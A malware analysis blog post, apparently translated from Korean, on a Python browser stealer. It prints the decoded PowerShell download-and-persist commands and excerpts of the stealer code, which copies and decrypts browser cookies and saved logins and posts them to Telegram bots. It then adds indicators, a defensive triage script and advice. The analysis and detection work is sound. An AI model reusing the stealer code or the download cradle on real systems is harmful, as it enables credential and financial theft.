꿈을꾸는 파랑새

Today I will write about ud123.bat, a stealer written in Python.
Python is an interpreted programming language created in 1991 by Guido van Rossum; today it is widely used as a teaching language.
First of all, this malware is a stealer, that is, it takes things: it is information-exfiltrating malware that steals personal and financial data such as browser history, credit card details and cryptocurrency wallet information. In a hex view you only see strange characters repeating, but if you scroll down you get the following result.
Viewed in CyberChef, the result looks like this.

MD5:f796cce1fb77fe1a71c8b248ced9fac4

Result after processing with CyberChef

C:\WINDOWS\System32\WindowsPowerShel(l)\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github(.)com/T1-1111/2222/raw/main/ud123(.)bat -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure123(.)bat";
C:\WINDOWS\System32\WindowsPowerS(h)ell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github(.)com/T1-1111/2222/raw/main/ud(.)bat -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";
powershell.exe -WindowStyle Hi(d)den -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType](:):Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('hxxps://github(.)com/T1-1111/222/raw/main/Document(.)zip', 'C:\Users\Public\Document(.)zip')";cmd /c powershell(.)exe -WindowStyle Hidden -Command Expand-Archive -Path "C:\Users\Public\Document.zip" -DestinationPath "C:/Users/Public/Document";powershell(.)exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim().py"

Code explanation

First, it downloads the ud123(.)bat file from GitHub and saves it in the user's Startup folder; this makes the malicious file run every time the user's computer starts.
The next command likewise downloads the ud(.)bat file from GitHub and saves it in the Startup folder.
Additional commands:
The Document(.)zip file is downloaded with the DownloadFile command; then:
cmd /c powershell(.)exe -WindowStyle Hidden -Command Expand-Archive -Path "C:\Users\Public\Document(.)zip" -DestinationPa(t)h "C:/Users/Public/Document";
extracts the downloaded ZIP file into the Public\Document folder, and
powershell(.)exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim().py"
runs the Python script inside the extracted folder. If you download Document(.)zip yourself, extract it and open sim().py, you will find that instead of simply putting the commands in plain sight, the author has annoyingly tucked the malicious code away at the very bottom.

Site where ud123.bat was uploaded

sim(.)py contents

import os,json,shutil,win32(c)rypt,hmac,sqlite(3),b(a)se64,random,req(u)ests,threading,time,platform
from C(r)ypto.Cipher import DES3,AES
from pyas(n)1.codec.der import decoder
from hashlib i(m)port sha1, pbkdf2_hmac
from Crypto.Util.(P)adding import unpad
from base(6)4 import b64decode
from d(a)tetime import (d)atetime
def demso() :
    if os.path(.)exists(os.path.join(os.env(i)ron["US(E)RPROFILE"], "App(D)ata", "Lo(c)al", "number(.)txt")):
        with o(p)en(os.path(.)join(os.environ["USER(P)ROFILE"], "A(p)pData", "(L)ocal","number(.)txt"), 'r') as file1:
            num(b)er = file1.read()
        number = in(t)(n(u)mber)+1
        with open(os.path.j(o)in(os.(e)nviron["USER(P)ROFILE"], "Ap(p)Data", "(L)ocal","nu(m)ber.txt"), 'w') as f(i)le2:
            file2.write(str(number))
    else:
        with open(os.path.(j)oin(os.environ["USERPROFILE"], "AppData", "Lo(c)al","num(b)er.txt"), 'w') as fil(e)3:
            file3.write("1")
            number = 1
    return num(b)er
def id():
    if os.path.ex(i)sts(os.path.join(os.e(n)viron["US(E)RPROFILE"], "AppDa(t)a", "Lo(c)al","id.txt")):
        with open(os.path(.)join(os.environ["USERPR(O)FILE"], "App(D)ata", "Lo(c)al","id(.)txt"), 'r') as file1:
            id = file1(.)read()
    else:
        random_number = ran(d)om.randint(10**14, 10**15 - 1)
        id = str(random_nu(m)ber)
        with open(os.path.joi(n)(os.environ["USERPROFILE"], "AppData", "Local","id.txt"), 'w') as file2:
            file2.write(id)
    return id


hostname = os(.)getenv("COMPUTERNAME")
usernamex = os(.)getlogin()
windows_version = platform.platform()
now = datetime(.)now()
response =request(s).get("hxxps://ipinfo(.)io").text
ip_country = json.loa(d)s(response)
ten_country = ip_country['region']
city = ip_country['city']
ip = ip_country['ip']
country_code = ip_country['country']
newtime = str(now.hour) + "h" +str(now.minute)+"m"+str(now.second)+"s"+"-"+str(now.day)+"-"+str(now.month)+"-"+str(now.year)
name_file = country_code +" "+ ip +" "+newtime


def find_profile(path_userdata):
    profile_path = []
    for name in os.listdir(path_userdata):
        if name.startswith("Profile") or name == 'Default':
            dir_path = os.path.join(path_userdata, name)
            profile_path.append(dir_path)
    return profile_path

def get_chrome(data_path,chrome_path):
    profiles = find_profile(chrome_path)
    def copy_file(l):
        profile = profiles[l]
        data_chrome = os.path.join(data_path, f"Chrome {l}");os.mkdir(data_chrome)
        try:
            if os.path.exists(os.path.join(profile,'Network','Cookies')):
                shutil.copyfile(os.path.join(profile,'Network','Cookies'),os.path.join(data_chrome,'Cookies'))
            if os.path.exists(os.pat(h).join(profile,'Login Data')):
                shutil.copyfile(o(s).path.join(profile,'Login Data'),os.path.join(data_chrome,'Login Data'))
            if os.path.exists((o)s.path.join(chrome_path,'Local State')):
                shutil.copyfile(os.path(.)join(chrome_path,'Local State'),os.path.join(data_chrome,'Local State'))
        except:print('copy chrome l?i')
        encrypt(data_chrome)
    threads = []
    for l in range(len(profiles)):
        threads+= [threading.Thread(target=copy_file,args={l},)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
def get_edge(data_path,edge_path):
    profiles = find_profile(edge_path)
    def copy_file(l):
        profile = profiles[l]
        data_edge = os.path.join(data_path, f"Edge {l}");os.mkdir(data_edge)
        try:
            os.system('taskkill /f /im msedge(.)exe')
            if os.path.exists(os.path.join(profile,'Network','Cookies')):
                shutil.copyfile(os.path.join(profile,'Network','Cookies'),os.path.join(data_edge,'Cookies'))
           ......
    if clearText == b'passw(o)rd-check\x02\x02':
      c.execute("SELECT a11,a1(0)2 FROM nssPrivate;")
      for row in c:
        if row[0] != None:
            break
      a11 = row[0]
      a102 = row[1]
      if a102 != None:
        decoded_a11 = decode(r.)decode( a11 )
        clearText= decryptPBE( d(e)coded_a11, globalSalt )
        return clea(r)Text[:24]
    return None
.....
        t.start()
    for t in threads:
        t.join()
    z_ph = os.path.join(os.(e)nviron["TEMP"], name_file +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    with open(z_ph, 'rb') as f:
        requests.post(u1,data={'caption': "\n"+"country :  " + city + "-"+ten_country+"-"+country_code +"\(n)" +"id :  " + id() +"\n"+ windows_version +"\nip: "+ip +"\nUsername :"+hostname+"/"+usernamex+ "\n"+ number,'chat_id': id1},files={'document': f})

    with open(z_ph, 'rb') as f1:
        requests.post(u2,data={'caption': "\n"+"country :  " + city + "-"+ten_country+"-"+country_code +"\n" +"id :  " + id() +"\n"+ windows_version +"\nip: "+ip +"\nUsername :"+hostname+"/"+usernamex+ "\n"+ number,'chat_id': id2},files={'document': f1})

mai(n)()

Code explanation

This Python code snippet is a stealer that exfiltrates user data from several browsers: it collects cookies and login data from Chrome, Firefox, Microsoft Edge, Opera, Brave and Chromium and then sends them to Telegram.
Library imports:
Uses various libraries such as os, json, shutil and requests for file manipulation and data transfer.
Uses win32crypt, Crypto, pyasn1 and hashlib for encryption and decryption.
Environment setup and collection of user information:
Collects system and user information with os.getenv, os.getlogin and platform.platform.
Fetches external IP information through requests.get("hxxps://ipinfo(.)io").text; this is something often seen on phishing sites impersonating Microsoft customer support.
Locating browser profiles:
The find_profile function finds browser profiles under the given path.
It searches the profile paths of Google Chrome, Microsoft Edge, Brave, Chromium, Opera and Firefox respectively.
Copying and decrypting data:
Copies the cookies, login data and Local State files from each browser's profile folder.
Decrypts the copied data (AES and DES3) and converts it to plaintext.
Sending the stolen data:
Sends the stolen data to Telegram using requests.post.
Attempts the exfiltration through two Telegram bots.
Main functions
demso(): reads the file number.txt and increments the current run count.
id(): reads the file id.txt and returns the user's unique ID, generating a new one if it does not exist.
get_chrome, get_edge, get_brave, get_chromium, get_opera: copy the data of Google Chrome, Microsoft Edge, Brave, Chromium and Opera respectively.
get_firefox: copies Firefox browser data.
encrypt: decrypts the data of Google Chrome and Chromium-based browsers and converts it to plaintext.
encrypt_firefox: decrypts Firefox browser data and converts it to plaintext.
main(): copies the browser data, compresses it and sends it through the Telegram bots.
The code is malware that collects the user's browser data (cookies, login data, etc.) and sends it to an external server; because site login information, account numbers and the like stored in the browser are stolen this way, the user can suffer financial loss.
In short: do not save passwords and similar data in the browser, follow basic security practices, and if you have so many accounts that you get them mixed up, I strongly recommend paying for and using a service such as Bitwarden, RoboForm or 1Password.
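Two host-side artifacts described in this post are what a responder would look for first: the .bat dropped into the user's Startup folder by the hidden PowerShell download (the persistence chain explained under the first "Code explanation"), and the number.txt / id.txt marker files that demso() and id() keep under the user's AppData\Local folder. The triage script below is an added example written for this post; it is not code from the malware or from the blog author. It takes the Startup and Local AppData directories as parameters so it can be pointed at a live profile or a mounted image, and the sample files it creates in a temporary directory are constructed for the demonstration (the repository name in the sample is a placeholder). The indicator strings it matches (Invoke-WebRequest / DownloadFile, -WindowStyle Hidden, Expand-Archive, a raw GitHub URL, and a python binary run out of C:\Users\Public) are taken from the command lines quoted above.

```python
import os
import re
import tempfile
from dataclasses import dataclass, field

# Indicators taken from the PowerShell one-liners quoted in the post, matched
# case-insensitively against each .bat/.cmd file found in the Startup folder.
CRADLE_INDICATORS = {
    "hidden-window": re.compile(r"-windowstyle\s+hidden", re.I),
    "web-download": re.compile(r"invoke-webrequest|downloadfile\(|webclient", re.I),
    "raw-github": re.compile(r"github\.com/[^\s'\"]+/raw/", re.I),
    "archive-extract": re.compile(r"expand-archive", re.I),
    "public-python": re.compile(r"users\\public\\[^\s\"']*python", re.I),
}

# Marker files the stealer keeps in AppData\Local: number.txt (run counter)
# and id.txt (random 15-digit victim id), per the demso() and id() functions.
MARKER_FILES = ("number.txt", "id.txt")


@dataclass
class Finding:
    path: str
    hits: list = field(default_factory=list)


def scan_startup_folder(startup_dir):
    """Return a Finding for every .bat/.cmd file matching at least one indicator."""
    findings = []
    if not os.path.isdir(startup_dir):
        return findings
    for name in sorted(os.listdir(startup_dir)):
        if not name.lower().endswith((".bat", ".cmd")):
            continue
        path = os.path.join(startup_dir, name)
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                content = fh.read()
        except OSError:
            continue
        hits = [tag for tag, rx in CRADLE_INDICATORS.items() if rx.search(content)]
        if hits:
            findings.append(Finding(path=path, hits=hits))
    return findings


def check_marker_files(local_appdata_dir):
    """Report the marker files if present. A numeric number.txt next to a
    15-digit id.txt is exactly the pattern the stealer's code writes."""
    files = {}
    for name in MARKER_FILES:
        path = os.path.join(local_appdata_dir, name)
        if os.path.isfile(path):
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                files[name] = fh.read().strip()
    suspicious = (
        re.fullmatch(r"\d{15}", files.get("id.txt", "")) is not None
        and files.get("number.txt", "").isdigit()
    )
    return {"files": files, "suspicious": suspicious}


def triage(startup_dir, local_appdata_dir):
    """Run both checks and combine them into one verdict."""
    startup = scan_startup_folder(startup_dir)
    markers = check_marker_files(local_appdata_dir)
    return {
        "startup_findings": startup,
        "markers": markers,
        "suspicious": bool(startup) or markers["suspicious"],
    }


def build_sample_profile():
    """Constructed sample data: a defanged dropper resembling the one in the
    post, a benign .bat, and both marker files, all in a temporary directory."""
    root = tempfile.mkdtemp(prefix="stealer-triage-")
    startup = os.path.join(root, "Startup")
    local = os.path.join(root, "Local")
    os.makedirs(startup)
    os.makedirs(local)
    dropper = (
        'C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden '
        'Invoke-WebRequest -URI hxxps://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/ud.bat '
        '-OutFile "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu'
        '\\Programs\\Startup\\WindowsSecure.bat";\n'
        'powershell.exe -WindowStyle Hidden -Command Expand-Archive -Path '
        '"C:\\Users\\Public\\Document.zip" -DestinationPath "C:/Users/Public/Document";'
        'powershell.exe -WindowStyle Hidden -Command '
        '"C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\Lib\\sim.py"\n'
    )
    with open(os.path.join(startup, "WindowsSecure.bat"), "w") as fh:
        fh.write(dropper)
    with open(os.path.join(startup, "mount-drive.bat"), "w") as fh:
        fh.write("@echo off\nnet use Z: \\\\fileserver\\share\n")
    with open(os.path.join(local, "number.txt"), "w") as fh:
        fh.write("3")
    with open(os.path.join(local, "id.txt"), "w") as fh:
        fh.write("123456789012345")
    return startup, local


if __name__ == "__main__":
    startup_dir, local_dir = build_sample_profile()
    verdict = triage(startup_dir, local_dir)
    for f in verdict["startup_findings"]:
        print(f"[!] {f.path}: {', '.join(f.hits)}")
    print("markers:", verdict["markers"])
    print("suspicious:", verdict["suspicious"])
```

On a real host, call triage() with %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and %LOCALAPPDATA% instead of the constructed directories; a benign Startup entry such as a drive-mapping batch file produces no finding, while the marker files alone are enough to flag the host even after the dropper has been removed.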
The security vendors detecting it on VirusTotal as of 2024-07-18 12:25:06 UTC are as follows.
ALYac:Trojan.GenericKD.73504228
Antiy-AVL:Trojan/Script.Agent
Arcabit:Trojan.Generic.D46195E4
BitDefender:Trojan.GenericKD.73504228
Emsisoft:Trojan.GenericKD.73504228 (B)
eScan:Trojan.GenericKD.73504228
GData:Trojan.GenericKD.73504228
Ikarus:Trojan.Batch
MAX:Malware (ai Score=81)
Trellix (HX):Trojan.GenericKD.73504228
Varist:ABTrojan.JDQJ-
VIPRE:Trojan.GenericKD.73504228

Malware distribution sites

hxxps://gitlab(.)com/1234080927/123
hxxps://github(.)com/T1-1111/

For my part, I have finished reporting it to Symantec, the antivirus product I personally use.
Always be careful. Personally, if we assume this is a North Korean hacking group, attacking this way would be a faster route to stealing the personal information of Koreans and of people involved in North Korea-related work, since your browsers hold quite a lot of valuable information, don't they?
